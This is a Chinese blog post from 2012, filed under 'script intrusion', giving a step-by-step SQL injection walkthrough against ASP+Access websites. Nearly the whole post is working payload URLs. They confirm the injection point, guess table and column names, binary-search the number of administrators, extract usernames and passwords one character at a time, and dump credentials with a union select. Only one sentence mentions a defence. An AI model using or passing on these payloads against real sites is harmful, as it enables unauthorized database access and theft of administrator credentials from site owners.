注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

谁认识‘金蓓’

迷途漫漫 终有所归

 
 
 

日志

 
 

asp+access 注入  

2012-11-06 00:09:15|  分类: 脚本入侵 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
1.打开IE,单击工具->internet选项->高级->显示友好http错误信息,前面的勾选去掉。

2.找到一个网站,后面带参数的网址。 例如:
http://192.168.0.12/chaoji/news.asp?id=91
向网址后面提交一个单引号,判断是否可以注入:
http://192.168.0.12/chaoji/news.asp?id=91‘
如果看到一下内容,说明可以注入:
Microsoft JETDatabase Engine 错误"80040e14"
字符串的语法错误在查询表达式中“id=91”
/chaoji/news.asp ,行7

为了防止此类注入,可以在request.QuertString()获得的字符串后面加入cint,可以返回出错信息但是是无法注入的,其次就是过滤掉相关的字符。

http://192.168.0.12/chaoji/news.asp?id=91
http://192.168.0.12/chaoji/news.asp?id=91and1=1(这里没有包含%20空格)
http://192.168.0.12/chaoji/news.asp?id=91and1=2
如果可以注入的话,在提交第2行的地址时,页面正常显示,第3行错误显示,因此,可以利用相关的sql语句来获得想要的信息:

判断是否存在一个名字叫 admin 的表:
http://192.168.0.12/chaoji/news.asp?id=91 and 0<(select count(*) from admin)
如果正常显示说明存在这个表(我们可以使用同样的方法去猜测数据库中的其他相关表的存在)
类似的,我们可以猜测这个表中存在的相关字段:
http://192.168.0.12/chaoji/news.asp?id=91 and 0<(select count(id) from admin)
假设存在id,usr,pwd 三个字段

使用2分法查询一下有几个管理员:
http://192.168.0.12/chaoji/news.asp?id=91 and 5>(select count(id) from admin)
http://192.168.0.12/chaoji/news.asp?id=91 and 1<(select count(id) from admin)
这一步假使得到的结果为3

猜测其中一个管理员的信息:
http://192.168.0.12/chaoji/news.asp?id=91 and 0<(select min(id) from admin)
使用2分法得到id=1,同样继续向下猜测其他表的信息:
http://192.168.0.12/chaoji/news.asp?id=91and 0<(select len(usr) from admin)
得到usr即用户名的长度为5,同样的:
http://192.168.0.12/chaoji/news.asp?id=91 and 0<(select len(pwd) from admin)
密码的长度也为5,接着猜测密码:
http://192.168.0.12/chaoji/news.asp?id=91 and 57<(select asc(mid(usr,1,1)) from admin)
密码的第一位为97,转换为字符是a 
http://192.168.0.12/chaoji/news.asp?id=91 and 57<(select asc(mid(usr,2,1)) from admin)
密码的第二位为100,字母是d,然后一次猜测,确定为: admin

以上就是一次完整的注入过程,常用的一些函数为:
asc(),chr(),mid(),abs(),a between b and c
另外,可以使用union语句进行联合查询:
http://192.168.0.12/chaoji/news.asp?id=91 union select 1,1,1,1,1 from admin 
使用此种方法首先确定显示表的列数,然后将想要显示的内容显示在页面中:
http://192.168.0.12/chaoji/news.asp?id=91 union select 1,usr,pwd,1,1 from admin
  评论这张
 
阅读(52)| 评论(1)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017